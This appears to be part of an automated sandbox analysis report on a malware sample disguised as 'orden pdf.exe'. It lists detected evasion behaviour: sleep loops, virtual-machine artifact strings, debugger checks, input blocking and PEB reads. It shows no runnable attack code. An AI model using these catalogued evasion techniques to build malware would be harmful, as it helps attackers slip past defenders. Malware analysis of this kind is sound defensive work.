Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00409A60 rdtsc 2_2_00409A60
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6660 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 5592 Thread sleep time: -90000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_001B6CA9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_001B60DD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_001B63F9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_001BEB60
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BF56F FindFirstFileW,FindClose, 0_2_001BF56F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_001BF5FA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C1B2F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C1C8A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 1_2_001B60DD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 1_2_001B63F9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_001BEB60
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_001B6CA9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BF56F FindFirstFileW,FindClose, 1_2_001BF56F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_001BF5FA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_001C1B2F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_001C1C8A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001C1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_001C1F94
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0018DDC0
Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000003.00000003.555421786.00000000089C5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluser
Source: explorer.exe, 00000003.00000000.266986539.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.257961088.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.267948920.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000003.00000000.258035922.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\orden pdf.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\orden pdf.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00409A60 rdtsc 2_2_00409A60
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0040AE10 LdrLoadDll, 2_2_0040AE10
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C6AAF BlockInput, 0_2_001C6AAF
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00173D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00173D19
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_001A3920
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018E01E LoadLibraryA,GetProcAddress, 0_2_0018E01E
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_3_014600AD mov ecx, dword ptr fs:[00000030h] 0_3_014600AD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_3_014600AD mov eax, dword ptr fs:[00000030h] 0_3_014600AD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_3_014601CB mov eax, dword ptr fs:[00000030h] 0_3_014601CB
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176B171 mov eax, dword ptr fs:[00000030h] 2_2_0176B171
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176B171 mov eax, dword ptr fs:[00000030h] 2_2_0176B171
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0178B944 mov eax, dword ptr fs:[00000030h] 2_2_0178B944
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0178B944 mov eax, dword ptr fs:[00000030h] 2_2_0178B944
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179513A mov eax, dword ptr fs:[00000030h] 2_2_0179513A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179513A mov eax, dword ptr fs:[00000030h] 2_2_0179513A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01784120 mov eax, dword ptr fs:[00000030h] 2_2_01784120
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01784120 mov eax, dword ptr fs:[00000030h] 2_2_01784120
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01784120 mov eax, dword ptr fs:[00000030h] 2_2_01784120
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01784120 mov eax, dword ptr fs:[00000030h] 2_2_01784120
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01784120 mov ecx, dword ptr fs:[00000030h] 2_2_01784120
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01769100 mov eax, dword ptr fs:[00000030h] 2_2_01769100
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01769100 mov eax, dword ptr fs:[00000030h] 2_2_01769100
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01769100 mov eax, dword ptr fs:[00000030h] 2_2_01769100
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0176B1E1
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0176B1E1
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0176B1E1
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0178C182 mov eax, dword ptr fs:[00000030h] 2_2_0178C182
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179A185 mov eax, dword ptr fs:[00000030h] 2_2_0179A185
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0177B02A mov eax, dword ptr fs:[00000030h] 2_2_0177B02A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0177B02A mov eax, dword ptr fs:[00000030h] 2_2_0177B02A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0177B02A mov eax, dword ptr fs:[00000030h] 2_2_0177B02A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0177B02A mov eax, dword ptr fs:[00000030h] 2_2_0177B02A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017E7016 mov eax, dword ptr fs:[00000030h] 2_2_017E7016
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017E7016 mov eax, dword ptr fs:[00000030h] 2_2_017E7016
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017E7016 mov eax, dword ptr fs:[00000030h] 2_2_017E7016
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01834015 mov eax, dword ptr fs:[00000030h] 2_2_01834015
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01834015 mov eax, dword ptr fs:[00000030h] 2_2_01834015
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 2_2_017FB8D0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017FB8D0 mov ecx, dword ptr fs:[00000030h] 2_2_017FB8D0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 2_2_017FB8D0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 2_2_017FB8D0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 2_2_017FB8D0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 2_2_017FB8D0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179F0BF mov ecx, dword ptr fs:[00000030h] 2_2_0179F0BF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179F0BF mov eax, dword ptr fs:[00000030h] 2_2_0179F0BF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179F0BF mov eax, dword ptr fs:[00000030h] 2_2_0179F0BF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A90AF mov eax, dword ptr fs:[00000030h] 2_2_017A90AF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01822073 mov eax, dword ptr fs:[00000030h] 2_2_01822073
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01769080 mov eax, dword ptr fs:[00000030h] 2_2_01769080
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01831074 mov eax, dword ptr fs:[00000030h] 2_2_01831074
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017E3884 mov eax, dword ptr fs:[00000030h] 2_2_017E3884
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017E3884 mov eax, dword ptr fs:[00000030h] 2_2_017E3884
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0181D380 mov ecx, dword ptr fs:[00000030h] 2_2_0181D380
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0182138A mov eax, dword ptr fs:[00000030h] 2_2_0182138A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176DB60 mov ecx, dword ptr fs:[00000030h] 2_2_0176DB60
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01835BA5 mov eax, dword ptr fs:[00000030h] 2_2_01835BA5
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176F358 mov eax, dword ptr fs:[00000030h] 2_2_0176F358
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176DB40 mov eax, dword ptr fs:[00000030h] 2_2_0176DB40
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0182131B mov eax, dword ptr fs:[00000030h] 2_2_0182131B
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01838B58 mov eax, dword ptr fs:[00000030h] 2_2_01838B58
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01771B8F mov eax, dword ptr fs:[00000030h] 2_2_01771B8F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01771B8F mov eax, dword ptr fs:[00000030h] 2_2_01771B8F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A927A mov eax, dword ptr fs:[00000030h] 2_2_017A927A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01769240 mov eax, dword ptr fs:[00000030h] 2_2_01769240
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01769240 mov eax, dword ptr fs:[00000030h] 2_2_01769240
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01769240 mov eax, dword ptr fs:[00000030h] 2_2_01769240
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01769240 mov eax, dword ptr fs:[00000030h] 2_2_01769240
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017652A5 mov eax, dword ptr fs:[00000030h] 2_2_017652A5
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017652A5 mov eax, dword ptr fs:[00000030h] 2_2_017652A5
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017652A5 mov eax, dword ptr fs:[00000030h] 2_2_017652A5
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017652A5 mov eax, dword ptr fs:[00000030h] 2_2_017652A5
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017652A5 mov eax, dword ptr fs:[00000030h] 2_2_017652A5
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0181B260 mov eax, dword ptr fs:[00000030h] 2_2_0181B260
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0181B260 mov eax, dword ptr fs:[00000030h] 2_2_0181B260
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179D294 mov eax, dword ptr fs:[00000030h] 2_2_0179D294
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179D294 mov eax, dword ptr fs:[00000030h] 2_2_0179D294
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0178C577 mov eax, dword ptr fs:[00000030h] 2_2_0178C577
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0178C577 mov eax, dword ptr fs:[00000030h] 2_2_0178C577
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01787D50 mov eax, dword ptr fs:[00000030h] 2_2_01787D50
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A3D43 mov eax, dword ptr fs:[00000030h] 2_2_017A3D43
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017E3540 mov eax, dword ptr fs:[00000030h] 2_2_017E3540
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01794D3B mov eax, dword ptr fs:[00000030h] 2_2_01794D3B
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01794D3B mov eax, dword ptr fs:[00000030h] 2_2_01794D3B
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01794D3B mov eax, dword ptr fs:[00000030h] 2_2_01794D3B
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h] 2_2_01773D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h] 2_2_01773D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h] 2_2_01773D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h] 2_2_01773D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h] 2_2_01773D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h] 2_2_01773D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h] 2_2_01773D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h] 2_2_01773D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h] 2_2_01773D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h] 2_2_01773D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h] 2_2_01773D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h] 2_2_01773D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01773D34 mov eax, dword ptr fs:[00000030h] 2_2_01773D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176AD30 mov eax, dword ptr fs:[00000030h] 2_2_0176AD30
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01818DF1 mov eax, dword ptr fs:[00000030h] 2_2_01818DF1
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01838D34 mov eax, dword ptr fs:[00000030h] 2_2_01838D34
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017935A1 mov eax, dword ptr fs:[00000030h] 2_2_017935A1
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179FD9B mov eax, dword ptr fs:[00000030h] 2_2_0179FD9B
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179FD9B mov eax, dword ptr fs:[00000030h] 2_2_0179FD9B
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01762D8A mov eax, dword ptr fs:[00000030h] 2_2_01762D8A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01762D8A mov eax, dword ptr fs:[00000030h] 2_2_01762D8A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01762D8A mov eax, dword ptr fs:[00000030h] 2_2_01762D8A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01762D8A mov eax, dword ptr fs:[00000030h] 2_2_01762D8A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01762D8A mov eax, dword ptr fs:[00000030h] 2_2_01762D8A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0178746D mov eax, dword ptr fs:[00000030h] 2_2_0178746D
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017FC450 mov eax, dword ptr fs:[00000030h] 2_2_017FC450
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017FC450 mov eax, dword ptr fs:[00000030h] 2_2_017FC450
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01838CD6 mov eax, dword ptr fs:[00000030h] 2_2_01838CD6
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179BC2C mov eax, dword ptr fs:[00000030h] 2_2_0179BC2C
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_018214FB mov eax, dword ptr fs:[00000030h] 2_2_018214FB
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821C06 mov eax, dword ptr fs:[00000030h] 2_2_01821C06
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0183740D mov eax, dword ptr fs:[00000030h] 2_2_0183740D
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0183740D mov eax, dword ptr fs:[00000030h] 2_2_0183740D
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0183740D mov eax, dword ptr fs:[00000030h] 2_2_0183740D
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0177EF40 mov eax, dword ptr fs:[00000030h] 2_2_0177EF40
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179E730 mov eax, dword ptr fs:[00000030h] 2_2_0179E730
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01764F2E mov eax, dword ptr fs:[00000030h] 2_2_01764F2E
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01764F2E mov eax, dword ptr fs:[00000030h] 2_2_01764F2E
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017FFF10 mov eax, dword ptr fs:[00000030h] 2_2_017FFF10
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017FFF10 mov eax, dword ptr fs:[00000030h] 2_2_017FFF10
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0183070D mov eax, dword ptr fs:[00000030h] 2_2_0183070D
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0183070D mov eax, dword ptr fs:[00000030h] 2_2_0183070D
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01838F6A mov eax, dword ptr fs:[00000030h] 2_2_01838F6A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0177766D mov eax, dword ptr fs:[00000030h] 2_2_0177766D
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01830EA5 mov eax, dword ptr fs:[00000030h] 2_2_01830EA5
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01830EA5 mov eax, dword ptr fs:[00000030h] 2_2_01830EA5
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01830EA5 mov eax, dword ptr fs:[00000030h] 2_2_01830EA5
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0181FEC0 mov eax, dword ptr fs:[00000030h] 2_2_0181FEC0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01838ED6 mov eax, dword ptr fs:[00000030h] 2_2_01838ED6
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176E620 mov eax, dword ptr fs:[00000030h] 2_2_0176E620
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176C600 mov eax, dword ptr fs:[00000030h] 2_2_0176C600
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176C600 mov eax, dword ptr fs:[00000030h] 2_2_0176C600
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176C600 mov eax, dword ptr fs:[00000030h] 2_2_0176C600
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017776E2 mov eax, dword ptr fs:[00000030h] 2_2_017776E2
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017916E0 mov ecx, dword ptr fs:[00000030h] 2_2_017916E0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017936CC mov eax, dword ptr fs:[00000030h] 2_2_017936CC
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0181FE3F mov eax, dword ptr fs:[00000030h] 2_2_0181FE3F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017E46A7 mov eax, dword ptr fs:[00000030h] 2_2_017E46A7
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017FFE87 mov eax, dword ptr fs:[00000030h] 2_2_017FFE87
